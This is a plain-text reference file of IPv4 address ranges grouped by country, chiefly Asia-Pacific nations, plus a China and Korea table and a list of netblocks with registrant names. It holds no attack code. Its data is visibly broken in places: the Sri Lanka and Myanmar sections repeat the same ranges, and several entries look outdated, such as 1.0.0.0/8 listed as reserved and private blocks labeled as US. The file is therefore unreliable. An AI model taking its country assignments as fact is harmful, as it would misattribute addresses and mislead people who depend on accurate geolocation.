202.15.0.0-202.15.255.255
202.16.0.0-202.19.255.255
202.20.90.0-202.20.90.255
202.20.110.0-202.20.110.255
202.20.123.0-202.20.123.255
202.20.124.0-202.20.124.255
202.21.112.0-202.21.127.255
202.21.150.0-202.21.151.255
202.21.152.0-202.21.153.255
202.22.64.0-202.22.127.255
202.23.0.0-202.23.255.255
202.24.0.0-202.25.255.255
202.26.0.0-202.26.255.255
202.32.0.0-202.35.255.255
202.48.0.0-202.48.255.255
202.83.128.0-202.83.191.255
202.139.192.0-202.139.207.255
202.140.0.0-202.140.31.255
202.176.0.32-202.176.0.63
202.176.0.64-202.176.0.127
202.176.0.128-202.176.0.255
202.176.1.0-202.176.1.255
202.176.2.0-202.176.3.255
202.208.0.0-202.223.255.255
202.224.0.0-202.255.255.255
203.82.128.0-203.82.159.255
203.104.128.0-203.104.191.255
203.104.192.0-203.104.223.255
203.131.128.0-203.131.159.255
203.136.0.0-203.139.255.255
203.140.0.0-203.141.255.255
203.165.0.0-203.165.255.255
203.178.0.0-203.179.255.255
203.180.0.0-203.183.255.255
203.192.128.0-203.192.159.255
203.216.0.0-203.216.127.255
203.216.128.0-203.216.191.255
210.2.0.0-210.2.255.255
210.20.0.0-210.21.255.255
210.81.0.0-210.81.127.255
210.88.0.0-210.88.127.255
210.88.128.0-210.88.191.255
210.88.192.0-210.88.223.255
210.128.0.0-210.159.255.255
210.160.0.0-210.175.255.255
210.188.0.0-210.191.255.255
210.196.0.0-210.199.255.255
210.224.0.0-210.239.255.255
210.248.0.0-210.255.255.255
211.0.0.0-211.15.255.255
211.16.0.0-211.19.255.255
211.120.0.0-211.127.255.255
211.128.0.0-211.135.255.255

Sri Lanka
---------------------------
202.21.32.0-202.21.63.255
202.51.128.0-202.51.159.255
203.115.0.0-203.115.63.255
203.142.0.0-203.142.31.255
203.143.0.0-203.143.31.255

Myanmar
-----------------------------
202.21.32.0-202.21.63.255
202.51.128.0-202.51.159.255
203.115.0.0-203.115.63.255
203.142.0.0-203.142.31.255
203.143.0.0-203.143.31.255

Mongolia
------------------------------
202.5.192.0-202.5.223.255
202.131.0.0-202.131.63.255
202.131.224.0-202.131.255.255
202.170.64.0-202.170.95.255
202.179.0.0-202.179.31.255

Macau
-----------------------------
202.171.252.0-202.171.255.255
202.172.0.0-202.172.63.255
202.172.64.0-202.172.95.255
202.173.0.0-202.173.31.255
202.174.0.0-202.174.63.255
202.175.0.0-202.175.255.255

Mauritius
----------------------------
202.60.0.0-202.60.31.255
202.123.0.0-202.123.31.255

Maldives
--------------------------
202.1.192.0-202.1.195.255

Nepal
--------------------------
202.51.0.0-202.51.31.255
202.51.64.0-202.51.95.255
202.52.0.0-202.52.31.255
202.52.224.0-202.52.255.255
202.53.0.0-202.53.31.255
202.70.64.0-202.70.127.255
202.79.32.0-202.79.63.255

Nauru
----------------------------
203.98.224.0-203.98.255.255

French Polynesia
---------------------------
202.3.128.0-202.3.128.255
202.3.224.0-202.3.255.255

Papua New Guinea
-----------------------------
202.0.80.0-202.0.80.255
202.1.32.0-202.1.63.255
202.1.240.0-202.1.255.255
202.58.128.0-202.58.159.255
202.61.0.0-202.61.31.255

Philippines
-------------------------------
61.9.0.0-61.9.127.255
202.0.16.0-202.0.31.255
202.0.91.0-202.0.91.255
202.4.0.0-202.4.15.255
202.8.224.0-202.8.255.255
202.12.17.0-202.12.17.255
202.12.18.0-202.12.18.255
202.43.128.0-202.43.191.255
202.43.192.0-202.43.223.255
202.47.0.0-202.47.31.255
202.47.96.0-202.47.127.255
202.47.128.0-202.47.135.255
202.47.136.0-202.47.139.255
202.47.140.0-202.47.141.255
202.56.96.0-202.56.127.255
202.57.32.0-202.57.63.255
202.57.64.0-202.57.127.255
202.58.96.0-202.58.127.255
202.58.224.0-202.58.255.255
202.59.128.0-202.59.159.255
202.61.64.0-202.61.95.255
202.78.64.0-202.78.127.255
202.79.128.0-202.79.159.255
202.89.96.0-202.89.127.255
202.90.128.0-202.90.191.255
202.93.64.0-202.93.127.255
202.134.0.0-202.134.31.255
202.134.224.0-202.134.255.255
202.136.0.0-202.136.127.255
202.138.128.0-202.138.159.255
202.163.224.0-202.163.255.255
202.164.128.0-202.164.159.255
202.168.0.0-202.168.1.255
203.78.224.0-203.78.255.255
203.84.192.0-203.84.223.255
203.87.128.0-203.87.159.255
203.104.64.0-203.104.95.255
203.167.0.0-203.167.127.255
203.168.0.0-203.168.127.255
203.169.0.0-203.169.63.255
203.170.0.0-203.170.31.255
203.171.0.0-203.171.63.255
203.171.64.0-203.171.95.255
203.172.0.0-203.172.255.255
203.174.0.0-203.174.127.255
203.175.0.0-203.175.127.255
203.176.0.0-203.177.255.255
210.14.0.0-210.14.31.255
210.16.0.0-210.16.127.255
210.23.96.0-210.23.127.255
210.23.192.0-210.23.255.255

Pakistan
------------------------------
202.5.128.0-202.5.159.255
202.59.64.0-202.59.95.255
202.63.192.0-202.63.223.255
202.87.96.0-202.87.127.255
202.163.96.0-202.163.127.255
202.165.224.0-202.165.255.255
202.179.128.0-202.179.159.255
203.89.128.0-203.89.191.255
203.128.0.0-203.128.63.255
203.128.192.0-203.128.255.255
203.129.0.0-203.129.63.255
203.130.0.0-203.130.63.255
203.133.192.0-203.133.255.255
203.134.192.0-203.134.255.255
203.135.0.0-203.135.63.255
210.56.0.0-210.56.31.255

Solomon Islands
------------------------------
202.1.160.0-202.1.191.255
202.63.224.0-202.63.255.255

Singapore
--------------------------
61.8.224.0-61.8.255.255
202.0.71.0-202.0.71.255
202.0.88.0-202.0.89.255
202.0.126.0-202.0.127.255
202.0.149.0-202.0.149.255
202.0.150.0-202.0.150.255
202.0.152.0-202.0.152.255
202.1.64.0-202.1.127.255
202.1.128.0-202.1.159.255
202.6.102.0-202.6.102.255
202.8.0.0-202.8.3.255
202.8.4.0-202.8.5.255
202.8.94.0-202.8.95.255
202.12.2.0-202.12.2.255
202.12.94.0-202.12.95.255
202.14.153.0-202.14.153.255
202.14.154.0-202.14.154.255
202.20.114.0-202.20.115.255
202.20.116.0-202.20.116.255
202.21.145.0-202.21.145.255
202.21.146.0-202.21.146.255
202.21.154.0-202.21.154.255
202.21.192.0-202.21.255.255
202.27.16.0-202.27.31.255
202.40.224.0-202.40.255.255
202.42.0.0-202.42.255.255
202.55.64.0-202.55.127.255
202.56.128.0-202.56.159.255
202.79.64.0-202.79.127.255
202.79.192.0-202.79.223.255
202.95.96.0-202.95.127.255
202.156.0.0-202.156.255.255
202.157.128.0-202.157.191.255
202.160.224.0-202.160.255.255
202.166.0.0-202.166.127.255
202.169.224.0-202.169.255.255
202.172.192.0-202.172.255.255
202.176.0.0-202.176.0.31
203.92.64.0-203.92.127.255
203.95.64.0-203.95.127.255
203.111.192.0-203.111.255.255
203.112.0.0-203.112.31.255
203.114.0.0-203.114.63.255
203.116.0.0-203.119.255.255
203.120.0.0-203.120.255.255
203.123.0.0-203.123.63.255
203.123.224.0-203.123.255.255
203.124.0.0-203.124.127.255
203.124.128.0-203.124.191.255
203.125.0.0-203.125.255.255
203.126.0.0-203.127.255.255
203.143.128.0-203.143.159.255
203.166.128.0-203.166.159.255
203.169.64.0-203.169.127.255
203.208.128.0-203.208.255.255
210.23.128.0-210.23.159.255
210.24.0.0-210.24.255.255

Thailand
-----------------------------
61.11.224.0-61.11.255.255
202.0.79.0-202.0.79.255
202.0.111.0-202.0.111.255
202.0.117.0-202.0.117.255
202.0.118.0-202.0.119.255
202.0.120.0-202.0.120.255
202.6.90.0-202.6.90.255
202.6.100.0-202.6.101.255
202.6.107.0-202.6.107.255
202.6.111.0-202.6.111.255
202.8.64.0-202.8.71.255
202.8.72.0-202.8.75.255
202.12.73.0-202.12.73.255
202.12.74.0-202.12.74.255
202.12.97.0-202.12.97.255
202.12.116.0-202.12.116.255
202.14.90.0-202.14.91.255
202.14.92.0-202.14.93.255
202.14.94.0-202.14.94.255
202.14.117.0-202.14.117.255
202.14.162.0-202.14.163.255
202.14.164.0-202.14.164.255
202.20.67.0-202.20.67.255
202.20.68.0-202.20.68.255
202.20.87.0-202.20.87.255
202.20.105.0-202.20.105.255
202.21.134.0-202.21.135.255
202.21.140.0-202.21.140.255
202.21.144.0-202.21.144.255
202.21.149.0-202.21.149.255
202.22.8.0-202.22.15.255
202.22.32.0-202.22.63.255
202.28.0.0-202.29.255.255
202.44.0.0-202.44.255.255
202.47.224.0-202.47.255.255
202.57.128.0-202.57.191.255
202.59.224.0-202.59.255.255
202.74.32.0-202.74.63.255
202.80.224.0-202.80.255.255
202.129.0.0-202.129.63.255
202.153.0.0-202.153.31.255
202.182.0.0-202.182.31.255
202.183.128.0-202.183.255.255
203.101.128.0-203.101.159.255
203.107.128.0-203.107.255.255
203.113.0.0-203.113.255.255
203.114.128.0-203.114.255.255
203.121.128.0-203.121.255.255
203.144.192.0-203.144.255.255
203.145.0.0-203.145.63.255
203.146.0.0-203.146.255.255
203.147.0.0-203.147.63.255
203.148.160.0-203.148.191.255
203.148.192.0-203.148.255.255
203.149.0.0-203.149.63.255
203.150.0.0-203.151.255.255
203.152.0.0-203.152.63.255
203.154.0.0-203.155.255.255
203.156.0.0-203.159.255.255
203.170.128.0-203.170.255.255
203.185.64.0-203.185.127.255
203.185.128.0-203.185.159.255

Taiwan
-----------------------------
61.13.0.0-61.13.255.255
202.2.52.0-202.2.55.255
202.3.160.0-202.3.191.255
202.5.224.0-202.5.255.255
202.14.8.0-202.14.15.255
202.39.0.0-202.39.255.255
202.43.64.0-202.43.127.255
202.52.64.0-202.52.127.255
202.60.64.0-202.60.95.255
202.61.32.0-202.61.63.255
202.80.128.0-202.80.159.255
202.90.64.0-202.90.127.255
202.143.128.0-202.143.159.255
202.145.32.0-202.145.63.255
202.145.64.0-202.145.127.255
202.145.128.0-202.145.255.255
202.154.192.0-202.154.223.255
202.157.224.0-202.157.255.255
202.160.64.0-202.160.95.255
202.162.64.0-202.162.95.255
202.166.192.0-202.166.255.255
202.168.192.0-202.168.223.255
202.173.32.0-202.173.63.255
202.174.64.0-202.174.127.255
202.178.128.0-202.178.255.255
203.64.0.0-203.71.255.255
203.72.0.0-203.75.255.255
203.77.0.0-203.77.127.255
203.78.0.0-203.78.31.255
203.79.0.0-203.79.31.255
203.79.128.0-203.79.255.255
203.95.128.0-203.95.255.255
203.105.192.0-203.105.255.255
203.107.0.0-203.107.63.255
203.133.0.0-203.133.127.255
203.135.224.0-203.135.255.255
203.149.128.0-203.149.255.255
203.160.224.0-203.160.255.255
203.161.128.0-203.161.159.255
203.163.192.0-203.163.223.255
203.187.0.0-203.187.127.255
203.203.0.0-203.203.255.255
210.17.0.0-210.17.127.255
210.58.0.0-210.59.255.255
210.60.0.0-210.63.255.255
210.64.0.0-210.71.255.255
210.200.0.0-210.200.255.255
210.201.0.0-210.201.127.255
210.208.0.0-210.208.255.255
210.209.0.0-210.209.63.255
210.240.0.0-210.247.255.255
211.20.0.0-211.23.255.255
211.72.0.0-211.79.255.255

Vietnam
------------------
203.160.0.0-203.160.31.255
203.161.0.0-203.161.63.255
203.161.64.0-203.161.95.255
203.162.0.0-203.162.255.255

China and Korea
----------------------------------

61.28.0.0 - 61.28.63.255 China
61.32.0.0 - 61.43.255.255 Korea
61.48.0.0 - 61.55.255.255 China
61.72.0.0 - 61.87.255.255 Korea
61.96.0.0 - 61.111.255.255 Korea
61.128.0.0 - 61.191.255.255 China
61.232.0.0 - 61.237.255.255 China
61.240.0.0 - 61.243.255.255 China
61.248.0.0 - 61.255.255.255 Korea
128.134.0.0 - 128.134.255.255 Korea
129.254.0.0 - 129.254.255.255 Korea
132.16.0.0 - 132.16.255.255 Korea
134.75.0.0 - 134.75.255.255 Korea
137.68.0.0 - 137.68.255.255 Korea
137.189.0.0 - 137.189.255.255 Chinese Unv of Hong Kong
141.223.0.0 - 141.223.255.255 Korea
143.248.0.0 - 143.248.255.255 Korea
147.6.0.0 - 147.6.255.255 Korea
147.43.0.0 - 147.43.255.255 Korea
147.46.0.0 - 147.47.255.255 Korea
150.150.0.0 - 150.150.255.255 Korea
150.183.0.0 - 150.183.255.255 Korea
150.197.0.0 - 150.197.255.255 Korea
152.99.0.0 - 152.99.255.255 Korea
152.149.0.0 - 152.149.255.255 Korea
154.10.0.0 - 154.10.255.255 Korea
155.230.0.0 - 155.230.255.255 Korea
156.147.0.0 - 156.147.255.255 Korea
157.197.0.0 - 157.197.255.255 Korea
158.44.0.0 - 158.44.255.255 Korea
159.226.0.0 - 159.226.255.255 China
161.122.0.0 - 161.122.255.255 Korea
161.207.0.0 - 161.207.255.255 China
162.105.0.0 - 162.105.255.255 China
163.152.0.0 - 163.152.255.255 Korea
163.180.0.0 - 163.180.255.255 Korea
163.239.0.0 - 163.239.255.255 Korea
164.124.0.0 - 164.125.255.255 Korea
165.132.0.0 - 165.133.255.255 Korea
165.141.0.0 - 165.141.255.255 Korea
165.186.0.0 - 165.186.255.255 Korea
165.194.0.0 - 165.194.255.255 Korea
165.213.0.0 - 165.213.255.255 Korea
165.229.0.0 - 165.229.255.255 Korea
165.243.0.0 - 165.244.255.255 Korea
165.246.0.0 - 165.246.255.255 Korea
166.79.0.0 - 166.79.255.255 Korea
166.103.0.0 - 166.104.255.255 Korea
166.111.0.0 - 166.111.255.255 China
166.125.0.0 - 166.125.255.255 Korea
167.139.0.0 - 167.139.255.255 China
168.78.0.0 - 168.78.255.255 Korea
168.115.0.0 - 168.115.255.255 Korea
168.126.0.0 - 168.126.255.255 Korea
168.131.0.0 - 168.131.255.255 Korea
168.154.0.0 - 168.154.255.255 Korea
168.160.0.0 - 168.160.255.255 China
168.188.0.0 - 168.188.255.255 Korea
168.219.0.0 - 168.219.255.255 Korea
168.248.0.0 - 168.249.255.255 Korea
169.140.0.0 - 169.140.255.255 Korea
192.5.90.0 - 192.5.90.255 Korea
192.83.122.0 - 192.83.122.255 China
192.100.2.0 - 192.100.2.255 Korea
192.104.15.0 - 192.104.15.255 Korea
192.124.154.0 - 192.124.154.255 China
192.132.15.0 - 192.132.15.255 Korea
192.132.247.0 - 192.132.251.255 Korea
192.188.170.0 - 192.188.170.255 China
192.195.39.0 - 192.195.40.255 Korea
192.203.138.0 - 192.203.146.255 Korea
192.245.249.0 - 192.245.251.255 Korea
192.249.16.0 - 192.249.31.255 Korea
198.17.7.0 - 198.17.7.255 China
198.97.132.0 - 198.97.132.255 China
198.178.187.0 - 198.178.187.255 Korea
202.0.110.0 - 202.0.110.255 China
202.0.160.0 - 202.0.179.255 China
202.4.128.0 - 202.4.159.255 China
202.4.252.0 - 202.4.255.255 China
202.6.95.0 - 202.6.95.255 Korea
202.14.88.0 - 202.14.88.255 China
202.14.103.0 - 202.14.103.255 Korea
202.14.165.0 - 202.14.165.255 Korea
202.14.235.0 - 202.14.238.255 China
202.20.82.0 - 202.20.86.255 Korea
202.20.99.0 - 202.20.99.255 Korea
202.20.119.0 - 202.20.119.255 Korea
202.20.120.0 - 202.20.120.255 China
202.20.128.0 - 202.20.255.255 Korea
202.21.0.0 - 202.21.7.255 Korea
202.22.248.0 - 202.22.255.255 China
202.30.0.0 - 202.31.255.255 Korea
202.38.0.0 - 202.38.15.255 China
202.38.32.0 - 202.38.47.255 China
202.38.64.0 - 202.38.138.255 China
202.38.140.0 - 202.38.156.255 China
202.38.158.0 - 202.38.161.255 China
202.38.164.0 - 202.38.176.255 China
202.38.184.0 - 202.38.255.255 China
202.90.0.0 - 202.90.3.255 China
202.90.252.0 - 202.91.3.255 China
202.91.128.0 - 202.91.131.255 China
202.92.0.0 - 202.92.3.255 China
202.92.252.0 - 202.93.3.255 China
202.93.252.0 - 202.93.255.255 China
202.94.0.0 - 202.94.31.255 China
202.95.0.0 - 202.95.31.255 China
202.95.252.0 - 202.122.39.255 China
202.122.128.0 - 202.122.128.255 China
202.127.0.0 - 202.127.63.255 China
202.127.128.0 - 202.127.255.255 China
202.130.0.0 - 202.130.31.255 China
202.130.224.0 - 202.130.255.255 China
202.131.208.0 - 202.131.223.255 China
202.136.252.0 - 202.136.255.255 China
202.189.128.0 - 202.189.191.255 Korea
202.192.0.0 - 202.207.255.255 China
203.81.16.0 - 203.81.31.255 China
203.87.224.0 - 203.88.3.255 China
203.89.0.0 - 203.89.3.255 China
203.90.0.0 - 203.90.3.255 China
203.91.0.0 - 203.91.3.255 China
203.92.0.0 - 203.92.3.255 China
203.93.0.0 - 203.94.31.255 China
203.95.0.0 - 203.95.7.255 China
203.128.128.0 - 203.128.159.255 China
203.184.0.0 - 203.184.3.255 China
203.192.0.0 - 203.192.31.255 China
203.196.0.0 - 203.196.3.255 China
203.207.64.0 - 203.208.19.255 China
203.212.0.0 - 203.212.15.255 China
203.222.192.0 - 203.222.207.255 China
203.223.0.0 - 203.223.15.255 China
203.224.0.0 - 203.255.255.255 Korea
210.5.0.0 - 210.5.31.255 China
210.5.128.0 - 210.5.143.255 China
210.12.0.0 - 210.13.255.255 China
210.14.160.0 - 210.15.191.255 China
210.21.0.0 - 210.22.255.255 China
210.25.0.0 - 210.47.255.255 China
210.51.0.0 - 210.53.255.255 China
210.72.0.0 - 210.78.255.255 China
210.79.224.0 - 210.79.255.255 China
210.80.96.0 - 210.80.111.255 Korea
210.82.0.0 - 210.83.255.255 China
210.90.0.0 - 210.127.255.255 Korea
210.178.0.0 - 210.183.255.255 Korea
210.192.96.0 - 210.192.127.255 China
210.204.0.0 - 210.207.255.255 Korea
210.211.0.0 - 210.211.15.255 China
210.216.0.0 - 210.223.255.255 Korea
211.32.0.0 - 211.63.255.255 Korea
211.64.0.0 - 211.71.255.255 China
211.80.0.0 - 211.103.255.255 China
211.104.0.0 - 211.119.255.255 Korea
211.136.0.0 - 211.167.255.255 China
211.168.0.0 - 211.255.255.255 Korea
218.0.0.0 - 218.31.255.255 China
218.36.0.0 - 218.39.255.255 Korea
218.48.0.0 - 218.55.255.255 Korea
218.56.0.0 - 218.99.255.255 China
218.104.0.0 - 218.108.255.255 China
218.144.0.0 - 218.159.255.255 Korea
218.192.0.0 - 218.205.255.255 China
218.232.0.0 - 218.239.255.255 Korea
218.240.0.0 - 218.247.255.255 China
219.72.0.0 - 219.72.255.255 China
219.128.0.0 - 219.159.255.255 China
219.216.0.0 - 219.219.255.255 China
219.232.0.0 - 219.235.255.255 China
219.236.0.0 - 219.237.255.255 China
219.240.0.0 - 219.241.255.255 Korea
219.242.0.0 - 219.247.255.255 China
219.248.0.0 - 219.255.255.255 Korea
220.64.0.0 - 220.92.255.255 Korea
220.112.0.0 - 220.115.255.255 China
220.160.0.0 - 220.191.255.255 China

 

----------------------------------------------------

range:1.0.0.0 - 1.255.255.255:US IANA (RESERVED-9)Internet Assigned Numbers Authority
range:12.47.20.0 - 12.47.21.255:US PORTCOM INC. (NETBLK-PORTCOM129-20)
range:12.5.179.0 - 12.5.179.255:US Washer Specialties (NETBLK-WASHSPEC-179-0)
range:128.134.0.0 - 128.134.255.255:KR Korea Telecom (SDN4)
range:128.6.0.0 - 128.6.255.255:US RUTGERS Rutgers University (NET-RUTGERS)
range:129.125.0.0 - 129.125.255.255:NL RUG University (NET-RUGNET)NL-9747 AD
range:130.206.0.0 - 130.206.255.255:ES RedIRIS (NET-IRIS)
range:130.225.0.0 - 130.225.255.255:DK Danish Computer Centre for Research and Education (NET-DENET-1)
range:130.237.0.0 - 130.237.255.255:SE Royal Institute of Technology (NET-SUNET-BACKBONE)
range:131.107.0.0 - 131.107.255.255:US Microsoft Corporation (NET-MICROSOFT)
range:134.100.0.0 - 134.100.255.255:DE University of Hamburg (NET-UNIHH)
range:134.93.0.0 - 134.93.255.255:DE UNI Johannes Gutenberg-Universitaet Mainz (UNI-MAINZ-B)
range:134.94.0.0 - 134.94.255.255:DE UNI KFA Forschungszentrum Juelich (KFA-NET)
range:134.95.0.0 - 134.95.255.255:DE UNI Universitaet zu Koeln (UNI-KOELN)
range:134.96.0.0 - 134.96.255.255:DE UNI Universitaet des Saarlandes (UNISB-LAN)
range:139.130.0.0 - 139.130.255.255:AU Telstra Corporation Limited (NET-TELSTRA-AU)
range:140.134.0.0 - 140.134.255.255:TW Ministery of Education (NET-TANET-B6)
range:141.30.0.0 - 141.30.255.255:DE Technische Universitaet Dresden
range:141.45.0.0 - 141.45.255.255:DE UNI Fachhochschule TW Berlin (FHTW-NET)
range:141.48.0.0 - 141.48.255.255:DE UNI Martin-Luther-Universitaet (MLU-LAN)
range:142.166.0.0 - 142.166.255.255:CA Stentor National Integrated Comm Network (NET-STENTOR8)
range:143.108.0.0 - 143.108.255.255:BR Fundacao de Amparo a Pesquisa do Estado de Sao Paulo (NET-ANSP)
range:145.236.0.0 - 145.236.255.255:HU Hungarian Telecommunications CL. (MATAV)
range:145.253.128.0 - 145.253.159.255:DE Mannesmann Arcor AG & Co (AOL-NET1)
range:145.253.161.0 - 145.253.191.255:DE Mannesmann Arcor AG & Co (AOL-NET2)
range:145.253.170.096 - 145.253.170.111:DE PRETTL Produktionsholding GmbH
range:145.253.193.0 - 145.253.194.255:DE Mannesmann Arcor AG & Co (AOL-NET3)
range:147.156.0.0 - 147.156.255.255:ES Valencia University (NET-UVALNET)
range:147.208.0.0 - 147.208.255.255:US Intel Corporation (NET-INTEL-FSO)
range:147.208.130.192 - 147.208.130.255:US ZONELABS-NTLS (NETBLK-ZONELABS-NTLS)
range:147.91.0.0 - 147.91.255.255:YU Univerzitet U Beogradu (NET-UNINET-BG)
range:148.122.0.0 - 148.122.255.255:NO Telenor AS (NET-NORTELE-F)
range:148.235.139.48 - 148.235.139.63:MX Frisa UNINET-BG(NETBLK-FRISA)
range:148.245.167.160 - 148.245.167.191:MX Frisa DEVLYN SA DE CV (NETBLK-DEVLYN-AVANTEL)
range:149.225.0.0 - 149.225.255.255:DE UUNET Deutschland GmbH (CUMULUS)
range:151.1.0.0 - 151.1.255.255:IT IUnet (NET-IUNET-BNET1)
range:151.2.0.0 - 151.2.255.255:IT ITnet WAN & Partner Organizations (NET-IUNET-BNET2)
range:151.24.0.0 - 151.31.255.255:IT LIBERO-INFOSTRADA Free Internet Dial-up Services
range:151.6.0.0 - 151.6.255.255:IT IUnet (NET-IUNET-BNET6)
range:152.101.0.0 - 152.101.255.255:HK Hong Kong Internet & Gateway Services Ltd. (NET-HKNET)
range:152.163.0.0 - 152.163.255.255:US AOL America Online, Inc. (NET-ANS-BNET8)
range:152.168.0.0 - 152.168.255.255:US America Online, Inc (NET-AOL3)
range:152.169.0.0 - 152.169.255.255:US America Online, Inc (NET-AOL2)
range:153.96.0.0 - 153.96.255.255:DE Fraunhofer Institut IITB (FHG-TOP-NET)
range:156.3.0.0 - 156.3.255.255:US Los Angeles County Office of Education (NET-LACOE)
range:157.100.0.0 - 157.100.255.255:EC ECUANET CORPORACION INFORMACION (NET-ECUANET)
range:157.158.0.0 - 157.158.255.255:PL Silesian University (PL-CKPOLSL-19981231)
range:157.25.0.0 - 157.25.255.255:PL Advanced Technology Manufacturing, Inc. (NET-POLIPCOM)
range:157.91.0.0 - 157.91.255.255:US Indiana Higher Education Telecommunication System
range:159.148.0.0 - 159.148.255.255:LV Academic Network of Latvian Universities (NET-LVNET)
range:159.226.0.0 - 159.226.255.255:CN Institute of C.T.S Academy(NET-NCFC)
range:160.45.0.0 - 160.45.255.255:DE UNI Freie Universit?t Berlin (FULAN)
range:161.132.0.0 - 161.132.255.255:PE Red Cientifica Peruana (NET-RCP)
range:162.58.0.0 - 162.58.255.255:US Federal Aviation Administration (NET-MMAC2)
range:163.13.0.0 - 163.32.255.255:TW Ministry of Education Computer Center (NETBLK-TANET-B)
range:164.100.0.0 - 164.100.255.255:IN National Informatics Centre (NET-NICNET2)
range:164.41.0.0 - 164.41.255.255:BR Universidade de Brasilia (NET-UNB-ANDF)
range:168.187.0.0 - 168.187.255.255:KW Kuwait Ministry of Communations (NET-MOC-KW)
range:168.234.0.0 - 168.234.255.255:GT Universidad del Valle de Guatemala (NET-MAYANET2)
range:168.243.0.0 - 168.243.255.255:SV SVNet San Salvador(NET-SVNET2)
range:168.70.0.0 - 168.70.255.255:HK Hongkong Telecom (NET-HKTNET)
range:172.128.0.0 - 172.191.255.255:US AOL America Online, Inc. (NETBLK-AOL-172BLK)
range:172.16.0.0 - 172.31.255.255:US IANA (IANA-BBLK-RESERVED)
range:192.114.0.0 - 192.118.255.255:IL ISRAEL-ISOC-RIPE
range:192.114.40.0 - 192.114.47.255:IL Active Communications Ltd. (ACTCOM-BLOCK-3)
range:192.114.80.0 - 192.114.83.255:IL Active Communications Ltd. (ACTCOM-BLOCK-2)
range:192.115.128.0 - 192.115.135.255:IL Active Communications Ltd. (ACTCOM-BLOCK-5)
range:192.115.56.0 - 192.115.63.255:IL Active Communications Ltd. (ACTCOM-BLOCK-1)
range:192.117.96.0 - 192.117.127.255:IL Active Communications Ltd. (ACTCOM-BLOCK-4)
range:192.150.249.0 - 192.150.249.255:TH Thammasat University (NET-TU-NET)
range:192.163.74.0 - 192.163.74.255:FI Helsinki Telephone Company (NET-LANLINK-43)
range:192.168.0.0 - 192.168.255.255:US IANA (IANA-CBLK-RESERVED)
range:192.228.128.0 - 192.228.255.255:MY Malaysia MIMOS (NETBLK-JARING)
range:192.36.125.0 - 192.36.125.255:SE Royal Institute of Technology (NET-SUNET-BACKBONE)
range:193.10.238.0 - 193.10.238.255:SE Karlstad University network SE-KAU
range:193.107.214.0 - 193.107.215.255:FR LAN TELEHOUSE KPNQwest France KQFR-214-215
range:193.11.224.0 - 193.11.255.255:SE CHALMERS-GU-STUDENT Goteborg University
range:193.140.160.0 - 193.140.162.255:TR Baskent Universitesi BASKENT-NET
range:193.188.101.144 - 193.188.101.151:BH MERIDIAN Hotel
range:193.189.182.0 - 193.189.183.255:SI SIOL-NET-SiOL d.o.o. (Slovenia Online)
range:193.192.123.0 - 193.192.126.255:TR NetOne Bilgi ve Iletisim Hizmetleri A.S.
range:193.219.212.0 - 193.219.213.255:UG Infocom Ltd STARCOM-UG Kampala, Uganda
range:193.227.0.0 - 193.227.31.255:EG Egyptian Universities Network EUN
range:193.227.163.0 - 193.227.163.255:LB Data Management, sal LBDM-0002
range:193.227.168.0 - 193.227.168.255:LB Data Management, sal LBDM-0020
range:193.227.176.0 - 193.227.176.255:LB Data Management, sal LBDM-0021
range:193.233.68.0 - 193.233.68.255:RU Moscow Power Engineering Institute MPEI-LAN-3
range:193.251.0.0 - 193.251.95.255:FR France Telecom IP2000 ADSL BAS (IP2000 ADSL BAS)
range:193.252.217.0 - 193.252.217.255:FR France Telecom IP2000 (IP2000-ADSL-BAS)
range:193.4.174.0 - 193.4.174.255:IS IS-LHTNET Linuhonnun hf
range:193.40.0.0 - 193.40.255.255:EE Estonian Educational and Research Network EE-EENET-960916
range:193.41.195.0 - 193.41.195.255:LV TALKS-NET SIA "Talks"
range:193.41.33.0 - 193.41.33.255:LV Latvian railroad company LDZ
range:193.41.45.0 - 193.41.45.255:LV School of Business Administration Turiba
range:193.68.64.0 - 193.68.73.255:LV EUnet Latvia VERNET
range:193.85.241.0 - 193.85.241.255:CZ MERIT Merit Group, a.s.
range:193.98.112.0 - 193.98.119.255:DE LN-NET envia.tel Telekommunikationsgesellschaft mbH
range:193.99.145.0 - 193.99.145.255:DE HEISE-HANNOVER
range:194.105.231.0 - 194.105.231.255:IS NovaMedia ltd.(IS-MEDIA)
range:194.105.56.0 - 194.105.57.47:LV Sia Internet Internet Service Provider Company
range:194.106.96.0 - 194.106.96.255:EE MicroLink Online Backbone MLO-BACKBONE
range:194.109.0.0 - 194.109.255.255:NL xs4all (NL-XS4ALL-960513)
range:194.109.224.0 - 194.109.255.255:NL XS4ALL Internet BV-ADSL-Static IP numbers
range:194.126.96.0 - 194.126.97.255:EE Estpak Data/Estonian Telephone Co
range:194.140.1.0 - 194.140.1.255:ES Fujitsu ICL Espana, S.A.
range:194.149.246.0 - 194.149.255.255:DE GAD DMZ Server Farm
range:194.152.125.0 - 194.152.125.255:AT INS Informations- und Netzwerksysteme (INS)
range:194.153.171.0 - 194.153.171.255:LV RBINET Rietumu Bank of Latvia
range:194.153.79.0 - 194.153.79.255:LV LATVIJAS-BANK Bank of Latvia
range:194.17.202.0 - 194.17.202.255:SE Vimmerby, Sweden ABRO
range:194.19.224.0 - 194.19.224.127:LV TELESENS-TELIALV Telesens SIA
range:194.199.50.0 - 194.199.53.255:FR IUT de SAINT-DIE FR-STDIE-IUT
range:194.200.0.0 - 194.200.0.15:GB PERA-NET Pera
range:194.200.13.0 - 194.200.13.255:GB Autonomy Systems Ltd AUTOSYSTE01
range:194.204.0.0 - 194.204.0.255:EE AS Nosper Ltd. EE-UNINET-0
range:194.204.96.0 - 194.204.127.255:MT Provider Local Internet Registry MT-WALDONET-951113
range:194.216.211.0 - 194.216.211.255:GB Watson, Farley & Williams(WFW-NET)
range:194.219.194.0 - 194.219.194.255:GR HELEXPO
range:194.24.128.0 - 194.24.159.255:AT AT-CONNECT AUSTRIA-NET1
range:194.249.0.0 - 194.249.255.255:SI ARNES (SI-ARNES-960301)
range:194.77.99.0 - 194.77.99.255:DE Magic Internet 3000 I-Cafe (MAGIC-NET)
range:194.8.1.0 - 194.8.4.255:LV LATNET-Geant LU MII Geant project
range:195.12.0.0 - 195.12.31.255:GB UK-HIWAY-960515
range:195.151.213.0 - 195.151.213.255:RU Vladimir-Teleservice VLADIMIR-TELE-NET
range:195.156.246.0 - 195.156.247.255:FI HTK-NET
range:195.158.128.0 - 195.158.159.255:DE ISIS Multimedia Net GmbH (DE-ISIS-961206)
range:195.162.208.0 - 195.162.223.255:BE TVD Internet - UPC Belgium (TVD-INTERNET)
range:195.170.230.0 - 195.170.230.255:RU District "B" CATV users (TTK-CATV-NET-1)
